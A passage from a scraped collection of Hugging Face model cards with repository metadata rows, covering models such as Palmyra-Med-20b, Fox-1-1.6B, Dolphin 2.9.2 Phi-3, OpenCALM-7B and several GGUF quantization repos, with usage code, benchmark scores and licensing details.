- [ELECTRA train code by KLUE](https://github.com/KLUE-benchmark/KLUE-ELECTRA)
### Blogs
- [Monologg's notes on training KoELECTRA](https://monologg.kr/categories/NLP/ELECTRA/)
- [Training BERT from scratch on a Colab TPU - Tensorflow/Google ver.](https://beomi.github.io/2020/02/26/Train-BERT-from-scratch-on-colab-TPU-Tensorflow-ver/)
|
Writer/palmyra-med-20b | Writer | "2023-12-21T17:27:54Z" | 3,661 | 31 | transformers | [
"transformers",
"pytorch",
"gpt2",
"text-generation",
"medical",
"palmyra",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-06-29T12:56:09Z" | ---
license: apache-2.0
language:
- en
tags:
- medical
- palmyra
---
# Palmyra-med-20b
## Model description
**Palmyra-Med-20b** is a 20 billion parameter Large Language Model that has been uptrained on
**Palmyra-Large** with a specialized custom-curated medical dataset.
The main objective of this model is to enhance performance in tasks related to medical dialogue
and question-answering.
- **Developed by:** [https://writer.com/](https://writer.com/);
- **Model type:** Causal decoder-only;
- **Language(s) (NLP):** English;
- **License:** Apache 2.0;
- **Finetuned from model:** [Palmyra-Large](https://huggingface.co/Writer/palmyra-large).
### Model Source
[Palmyra-Med: Instruction-Based Fine-Tuning of LLMs Enhancing Medical Domain Performance](https://dev.writer.com/docs/palmyra-med-instruction-based-fine-tuning-of-llms-enhancing-medical-domain-performance)
## Uses
### Out-of-Scope Use
Production use without adequate assessment of risks and mitigation; any use cases which may be considered irresponsible or harmful.
## Bias, Risks, and Limitations
Palmyra-Med-20B is mostly trained on English data, and will not generalize appropriately to other languages. Furthermore, as it is trained on a large-scale corpora representative of the web, it will carry the stereotypes and biases commonly encountered online.
### Recommendations
We recommend users of Palmyra-Med-20B to develop guardrails and to take appropriate precautions for any production use.
## Usage
The model is compatible with the huggingface `AutoModelForCausalLM` and can be easily run on a single 40GB A100.
```py
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
model_name = "Writer/palmyra-med-20b"
tokenizer = AutoTokenizer.from_pretrained(model_name, use_fast=False)
model = AutoModelForCausalLM.from_pretrained(
model_name,
device_map="auto",
torch_dtype=torch.float16,
)
prompt = "Can you explain in simple terms how vaccines help our body fight diseases?"
input_text = (
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions. "
"USER: {prompt} "
"ASSISTANT:"
)
model_inputs = tokenizer(input_text.format(prompt=prompt), return_tensors="pt").to(
"cuda"
)
gen_conf = {
"temperature": 0.7,
"repetition_penalty": 1.0,
"max_new_tokens": 512,
"do_sample": True,
}
out_tokens = model.generate(**model_inputs, **gen_conf)
response_ids = out_tokens[0][len(model_inputs.input_ids[0]) :]
output = tokenizer.decode(response_ids, skip_special_tokens=True)
print(output)
## output ##
# Vaccines stimulate the production of antibodies by the body's immune system.
# Antibodies are proteins produced by B lymphocytes in response to foreign substances, such as viruses and bacteria.
# The antibodies produced by the immune system can bind to and neutralize the pathogens, preventing them from invading and damaging the host cells.
# Vaccines work by introducing antigens, which are components of the pathogen, into the body.
# The immune system then produces antibodies against the antigens, which can recognize and neutralize the pathogen if it enters the body in the future.
# The use of vaccines has led to a significant reduction in the incidence and severity of many diseases, including measles, mumps, rubella, and polio.
```
It can also be used with text-generation-inference
```sh
model=Writer/palmyra-med-20b
volume=$PWD/data
docker run --gpus all --shm-size 1g -p 8080:80 -v $volume:/data ghcr.io/huggingface/text-generation-inference --model-id $model
```
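Once the container is running, the endpoint can be queried from Python, for example with `huggingface_hub`'s `InferenceClient` (a minimal sketch assuming the default port mapping from the command above):
```py
# Minimal sketch (not from the original card): querying the TGI container started above.
from huggingface_hub import InferenceClient

client = InferenceClient("http://127.0.0.1:8080")

prompt = (
    "A chat between a curious user and an artificial intelligence assistant. "
    "The assistant gives helpful, detailed, and polite answers to the user's questions. "
    "USER: What are common symptoms of iron deficiency? "
    "ASSISTANT:"
)
print(client.text_generation(prompt, max_new_tokens=256, temperature=0.7))
```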
## Dataset
For the fine-tuning of our LLMs, we used a custom-curated medical dataset that combines data from
two publicly available sources: PubMedQA (Jin et al. 2019) and MedQA (Zhang et al. 2018). The
PubMedQA dataset, which originated from the PubMed abstract database, consists of biomedical
articles accompanied by corresponding question-answer pairs. In contrast, the MedQA dataset
features medical questions and answers that are designed to assess the reasoning capabilities of
medical question-answering systems.
We prepared our custom dataset by merging and processing data from the aforementioned sources,
maintaining the dataset mixture ratios detailed in Table 1. These ratios were consistent for fine-tuning
both Palmyra-20b and Palmyra-40b models. Upon fine-tuning the models with this dataset, we refer
to the resulting models as Palmyra-Med-20b and Palmyra-Med-40b, respectively.
| Dataset | Ratio | Count |
| -----------|----------- | ----------- |
| PubMedQA | 75% | 150,000 |
| MedQA | 25% | 10,178 |
## Evaluation
We present the findings of our experiments, beginning with the evaluation outcomes of
the fine-tuned models and followed by a discussion of the base models’ performance on each of the
evaluation datasets. Additionally, we report the progressive improvement of the Palmyra-Med-40b
model throughout the training process on the PubMedQA dataset.
| Model | PubMedQA | MedQA |
| -----------|----------- | ----------- |
| Palmyra-20b | 49.8 | 31.2 |
| Palmyra-40b | 64.8 | 43.1|
| Palmyra-Med-20b| 75.6 | 44.6|
| Palmyra-Med-40b| 81.1 | 72.4|
## Limitation
The model may not operate efficiently beyond the confines of the healthcare field.
Since it has not been subjected to practical scenarios, its real-time efficacy and precision remain undetermined.
Under no circumstances should it replace the advice of a medical professional, and it must be regarded solely as a tool for research purposes.
## Citation and Related Information
To cite this model:
```
@misc{Palmyra-Med-20B,
author = {Writer Engineering team},
title = {{Palmyra-Large Parameter Autoregressive Language Model}},
howpublished = {\url{https://dev.writer.com}},
year = 2023,
month = March
}
```
## Contact
[email protected]
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_Writer__palmyra-med-20b)
| Metric | Value |
|-----------------------|---------------------------|
| Avg. | 40.02 |
| ARC (25-shot) | 46.93 |
| HellaSwag (10-shot) | 73.51 |
| MMLU (5-shot) | 44.34 |
| TruthfulQA (0-shot) | 35.47 |
| Winogrande (5-shot) | 65.35 |
| GSM8K (5-shot) | 2.65 |
| DROP (3-shot) | 11.88 |
|
tensoropera/Fox-1-1.6B | tensoropera | "2024-06-28T20:01:45Z" | 3,661 | 19 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-06-13T00:05:14Z" | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
---
## Model Card for Fox-1-1.6B
> [!IMPORTANT]
> This model is a base pretrained model which requires further finetuning for most use cases.
> For a more interactive experience, we
> recommend [tensoropera/Fox-1-1.6B-Instruct-v0.1](https://huggingface.co/tensoropera/Fox-1-1.6B-Instruct-v0.1), the
> instruction-tuned version of Fox-1.
Fox-1 is a decoder-only transformer-based small language model (SLM) with 1.6B total parameters developed
by [TensorOpera AI](https://tensoropera.ai/). The model was trained with a 3-stage data curriculum on 3 trillion
tokens of text and code data with an 8K sequence length. Fox-1 uses Grouped Query Attention (GQA) with 4 key-value heads and
16 attention heads for faster inference.
For the full details of this model please read
our [release blog post](https://blog.tensoropera.ai/tensoropera-unveils-fox-foundation-model-a-pioneering-open-source-slm-leading-the-way-against-tech-giants).
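The checkpoint is published in the standard `transformers` format, so a minimal text-completion sketch looks like the following (generation settings are illustrative and not part of the original card):
```python
# Minimal sketch: plain text completion with the base (non-instruct) model.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "tensoropera/Fox-1-1.6B"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(
    model_id, torch_dtype=torch.bfloat16, device_map="auto"
)

inputs = tokenizer("The quick brown fox", return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=64, do_sample=True, temperature=0.7, top_p=0.9)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```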
## Benchmarks
We evaluated Fox-1 on ARC Challenge (25-shot), HellaSwag (10-shot), TruthfulQA (0-shot), MMLU (5-shot),
Winogrande (5-shot), and GSM8k (5-shot). We follow the Open LLM Leaderboard's evaluation setup and report the average
score of the 6 benchmarks. The model was evaluated on a machine with 8*H100 GPUs.
| | Fox-1-1.6B | Qwen-1.5-1.8B | Gemma-2B | StableLM-2-1.6B | OpenELM-1.1B |
|---------------|------------|---------------|----------|-----------------|--------------|
| GSM8k | 36.39% | 34.04% | 17.06% | 17.74% | 2.27% |
| MMLU | 43.05% | 47.15% | 41.71% | 39.16% | 27.28% |
| ARC Challenge | 41.21% | 37.20% | 49.23% | 44.11% | 36.26% |
| HellaSwag | 62.82% | 61.55% | 71.60% | 70.46% | 65.23% |
| TruthfulQA | 38.66% | 39.37% | 33.05% | 38.77% | 36.98% |
| Winogrande | 60.62% | 65.51% | 65.51% | 65.27% | 61.64% |
| Average | 47.13% | 46.81% | 46.36% | 45.92% | 38.28% |
|
macadeliccc/dolphin-2.9.2-Phi-3-Medium-GGUF | macadeliccc | "2024-06-20T05:20:07Z" | 3,661 | 0 | null | [
"gguf",
"en",
"dataset:cognitivecomputations/Dolphin-2.9.2",
"dataset:teknium/OpenHermes-2.5",
"dataset:m-a-p/CodeFeedback-Filtered-Instruction",
"dataset:cognitivecomputations/dolphin-coder",
"dataset:cognitivecomputations/samantha-data",
"dataset:microsoft/orca-math-word-problems-200k",
"dataset:internlm/Agent-FLAN",
"dataset:cognitivecomputations/SystemChat-2.0",
"base_model:unsloth/Phi-3-mini-4k-instruct",
"license:mit",
"region:us"
] | null | "2024-06-19T19:28:18Z" | ---
license: mit
language:
- en
base_model:
- unsloth/Phi-3-mini-4k-instruct
datasets:
- cognitivecomputations/Dolphin-2.9.2
- teknium/OpenHermes-2.5
- m-a-p/CodeFeedback-Filtered-Instruction
- cognitivecomputations/dolphin-coder
- cognitivecomputations/samantha-data
- microsoft/orca-math-word-problems-200k
- internlm/Agent-FLAN
- cognitivecomputations/SystemChat-2.0
---
**Original Model Card**
# Dolphin 2.9.2 Phi 3 Medium 🐬
Curated and trained by Eric Hartford, Lucas Atkins, Fernando Fernandes, and with help from the community of Cognitive Computations
[](https://discord.gg/cognitivecomputations)
Discord: https://discord.gg/cognitivecomputations
<img src="https://cdn-uploads.huggingface.co/production/uploads/63111b2d88942700629f5771/ldkN1J0WIDQwU4vutGYiD.png" width="600" />
Our appreciation for the sponsor of Dolphin 2.9.2:
- [Crusoe Cloud](https://crusoe.ai/) - provided excellent on-demand 8xL40S node
This model is based on Phi-3-Medium-Instruct-4k, and is governed by the MIT license with which Microsoft released Phi-3.
Since Microsoft only released the fine-tuned model, Dolphin-2.9.2-Phi-3-Medium has not been entirely cleaned of refusals.
The base model has a 4k context, and the qLoRA fine-tuning was done with a 4k sequence length.
Training took 3.5 days on an 8xL40S node provided by Crusoe Cloud.
This model uses the ChatML prompt template.
example:
```
<|im_start|>system
You are Dolphin, a helpful AI assistant.<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant
```
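For quick local testing of the GGUF files in this repository, a minimal `llama-cpp-python` sketch built on this ChatML template could look like the following (the filename is an assumption; use whichever quant file you downloaded):
```python
# Illustrative sketch, not from the original card. The model_path filename is an
# assumption; point it at the GGUF file you actually downloaded from this repo.
from llama_cpp import Llama

llm = Llama(
    model_path="./dolphin-2.9.2-phi-3-medium.Q4_K_M.gguf",
    n_ctx=4096,            # the base model has a 4k context
    chat_format="chatml",  # Dolphin 2.9.2 uses the ChatML prompt template
)

response = llm.create_chat_completion(
    messages=[
        {"role": "system", "content": "You are Dolphin, a helpful AI assistant."},
        {"role": "user", "content": "Write a short haiku about dolphins."},
    ],
    max_tokens=256,
)
print(response["choices"][0]["message"]["content"])
```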
Dolphin-2.9.2 has a variety of instruction, conversational, and coding skills. It also has initial agentic abilities and supports function calling.
We have filtered the dataset to remove alignment and bias. This makes the model more compliant. You are advised to implement your own alignment layer before exposing the model as a service. Please read my blog post about uncensored models: https://erichartford.com/uncensored-models. You are responsible for any content you create using this model. Enjoy responsibly.

[<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
## evals:
<img src="https://i.ibb.co/jrBsPLY/file-9gw-A1-Ih-SBYU3-PCZ92-ZNb-Vci-P.png" width="600" /> |
cyberagent/open-calm-7b | cyberagent | "2023-05-18T01:12:08Z" | 3,660 | 202 | transformers | [
"transformers",
"pytorch",
"gpt_neox",
"text-generation",
"japanese",
"causal-lm",
"ja",
"dataset:wikipedia",
"dataset:cc100",
"dataset:mc4",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-05-15T07:53:34Z" | ---
license: cc-by-sa-4.0
datasets:
- wikipedia
- cc100
- mc4
language:
- ja
tags:
- japanese
- causal-lm
inference: false
---
# OpenCALM-7B
## Model Description
OpenCALM is a suite of decoder-only language models pre-trained on Japanese datasets, developed by CyberAgent, Inc.
## Usage
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
model = AutoModelForCausalLM.from_pretrained("cyberagent/open-calm-7b", device_map="auto", torch_dtype=torch.float16)
tokenizer = AutoTokenizer.from_pretrained("cyberagent/open-calm-7b")
inputs = tokenizer("AIによって私達の暮らしは、", return_tensors="pt").to(model.device)
with torch.no_grad():
tokens = model.generate(
**inputs,
max_new_tokens=64,
do_sample=True,
temperature=0.7,
top_p=0.9,
repetition_penalty=1.05,
pad_token_id=tokenizer.pad_token_id,
)
output = tokenizer.decode(tokens[0], skip_special_tokens=True)
print(output)
```
## Model Details
|Model|Params|Layers|Dim|Heads|Dev ppl|
|:---:|:---: |:---:|:---:|:---:|:---:|
|[cyberagent/open-calm-small](https://huggingface.co/cyberagent/open-calm-small)|160M|12|768|12|19.7|
|[cyberagent/open-calm-medium](https://huggingface.co/cyberagent/open-calm-medium)|400M|24|1024|16|13.8|
|[cyberagent/open-calm-large](https://huggingface.co/cyberagent/open-calm-large)|830M|24|1536|16|11.3|
|[cyberagent/open-calm-1b](https://huggingface.co/cyberagent/open-calm-1b)|1.4B|24|2048|16|10.3|
|[cyberagent/open-calm-3b](https://huggingface.co/cyberagent/open-calm-3b)|2.7B|32|2560|32|9.7|
|[cyberagent/open-calm-7b](https://huggingface.co/cyberagent/open-calm-7b)|6.8B|32|4096|32|8.2|
* **Developed by**: [CyberAgent, Inc.](https://www.cyberagent.co.jp/)
* **Model type**: Transformer-based Language Model
* **Language**: Japanese
* **Library**: [GPT-NeoX](https://github.com/EleutherAI/gpt-neox)
* **License**: OpenCALM is licensed under the Creative Commons Attribution-ShareAlike 4.0 International License ([CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/)). When using this model, please provide appropriate credit to CyberAgent, Inc.
* Example (en): This model is a fine-tuned version of OpenCALM-XX developed by CyberAgent, Inc. The original model is released under the CC BY-SA 4.0 license, and this model is also released under the same CC BY-SA 4.0 license. For more information, please visit: https://creativecommons.org/licenses/by-sa/4.0/
* Example (ja): 本モデルは、株式会社サイバーエージェントによるOpenCALM-XXをファインチューニングしたものです。元のモデルはCC BY-SA 4.0ライセンスのもとで公開されており、本モデルも同じくCC BY-SA 4.0ライセンスで公開します。詳しくはこちらをご覧ください: https://creativecommons.org/licenses/by-sa/4.0/
## Training Dataset
* Wikipedia (ja)
* Common Crawl (ja)
## Author
[Ryosuke Ishigami](https://huggingface.co/rishigami)
## Citations
```bibtex
@software{gpt-neox-library,
title = {{GPT-NeoX: Large Scale Autoregressive Language Modeling in PyTorch}},
author = {Andonian, Alex and Anthony, Quentin and Biderman, Stella and Black, Sid and Gali, Preetham and Gao, Leo and Hallahan, Eric and Levy-Kramer, Josh and Leahy, Connor and Nestler, Lucas and Parker, Kip and Pieler, Michael and Purohit, Shivanshu and Songz, Tri and Phil, Wang and Weinbach, Samuel},
url = {https://www.github.com/eleutherai/gpt-neox},
doi = {10.5281/zenodo.5879544},
month = {8},
year = {2021},
version = {0.0.1},
}
``` |
mradermacher/MD-Judge-German-v0.1-GGUF | mradermacher | "2024-06-14T21:06:03Z" | 3,659 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:felfri/MD-Judge-German-v0.1",
"endpoints_compatible",
"region:us"
] | null | "2024-06-14T19:39:37Z" | ---
base_model: felfri/MD-Judge-German-v0.1
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/felfri/MD-Judge-German-v0.1
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
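As a minimal sketch (not part of the original card), a single quant from the table below can be downloaded and loaded with `huggingface_hub` and `llama-cpp-python`:
```python
# Sketch: download one quant from this repo and run it with llama-cpp-python.
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

path = hf_hub_download(
    repo_id="mradermacher/MD-Judge-German-v0.1-GGUF",
    filename="MD-Judge-German-v0.1.Q4_K_M.gguf",  # one of the files listed below
)
llm = Llama(model_path=path, n_ctx=4096)
print(llm("Hallo! Wie geht es dir?", max_tokens=64)["choices"][0]["text"])
```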
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Judge-German-v0.1-GGUF/resolve/main/MD-Judge-German-v0.1.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/Writing_Partner_Mistral_7B-GGUF | mradermacher | "2024-06-11T15:02:37Z" | 3,658 | 0 | transformers | [
"transformers",
"gguf",
"mistral",
"instruct",
"finetune",
"chatml",
"gpt4",
"en",
"base_model:FPHam/Writing_Partner_Mistral_7B",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-11T10:58:50Z" | ---
base_model: FPHam/Writing_Partner_Mistral_7B
language:
- en
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- mistral
- instruct
- finetune
- chatml
- gpt4
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/FPHam/Writing_Partner_Mistral_7B
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Writing_Partner_Mistral_7B-GGUF/resolve/main/Writing_Partner_Mistral_7B.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Ganeshkumar34/llama3-8b-kovaion_cpp | Ganeshkumar34 | "2024-06-26T11:32:01Z" | 3,656 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/llama-3-8b-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-25T07:04:21Z" | ---
base_model: unsloth/llama-3-8b-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** Ganeshkumar34
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
roneneldan/TinyStories-3M | roneneldan | "2023-05-17T22:11:46Z" | 3,653 | 2 | transformers | [
"transformers",
"pytorch",
"gpt_neo",
"text-generation",
"arxiv:2305.07759",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2023-05-12T21:46:51Z" | Model trained on the TinyStories Dataset, see https://arxiv.org/abs/2305.07759
------ EXAMPLE USAGE ---
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model = AutoModelForCausalLM.from_pretrained("roneneldan/TinyStories-3M")
tokenizer = AutoTokenizer.from_pretrained("EleutherAI/gpt-neo-125M")

prompt = "Once upon a time there was"
input_ids = tokenizer.encode(prompt, return_tensors="pt")

# Generate completion
output = model.generate(input_ids, max_length=1000, num_beams=1)

# Decode the completion
output_text = tokenizer.decode(output[0], skip_special_tokens=True)

# Print the generated text
print(output_text)
``` |
akreal/tiny-random-LlamaForCausalLM | akreal | "2023-04-19T21:39:04Z" | 3,652 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-07-26T23:07:36Z" | ---
duplicated_from: HuggingFaceM4/tiny-random-LlamaForCausalLM
---
|
PrunaAI/internlm-internlm2-1_8b-GGUF-smashed | PrunaAI | "2024-06-28T22:20:00Z" | 3,651 | 0 | null | [
"gguf",
"pruna-ai",
"region:us"
] | null | "2024-06-28T22:09:06Z" | ---
thumbnail: "https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"
metrics:
- memory_disk
- memory_inference
- inference_latency
- inference_throughput
- inference_CO2_emissions
- inference_energy_consumption
tags:
- pruna-ai
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<a href="https://www.pruna.ai/" target="_blank" rel="noopener noreferrer">
<img src="https://i.imgur.com/eDAlcgk.png" alt="PrunaAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</a>
</div>
<!-- header end -->
[](https://twitter.com/PrunaAI)
[](https://github.com/PrunaAI)
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
[](https://discord.com/invite/vb6SmA3hxu)
## This repo contains GGUF versions of the internlm/internlm2-1_8b model.
# Simply make AI models cheaper, smaller, faster, and greener!
- Give a thumbs up if you like this model!
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
- Read the documentations to know more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/)
- Join Pruna AI community on Discord [here](https://discord.com/invite/vb6SmA3hxu) to share feedback/suggestions or get help.
**Frequently Asked Questions**
- ***How does the compression work?*** The model is compressed with GGUF.
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
- ***What is the model format?*** We use GGUF format.
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use-cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
# Downloading and running the models
